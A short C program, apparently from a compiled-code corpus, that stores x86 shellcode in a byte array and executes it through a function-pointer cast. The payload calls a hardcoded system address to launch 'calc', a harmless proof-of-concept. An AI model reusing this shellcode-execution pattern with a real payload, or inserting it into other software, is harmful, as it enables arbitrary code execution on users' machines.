
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 void stub1 () ;

int main(int argc, char *argv[])
{
    char shellcode[] =
        "\x31\xC9"
        "\x51"
        "\x68\x63\x61\x6C\x63"
        "\x54"
        "\xB8\xC7\x93\xC2\x77"
        "\xFF\xD0";

    ((void(*)())shellcode)();

    return 0;
}
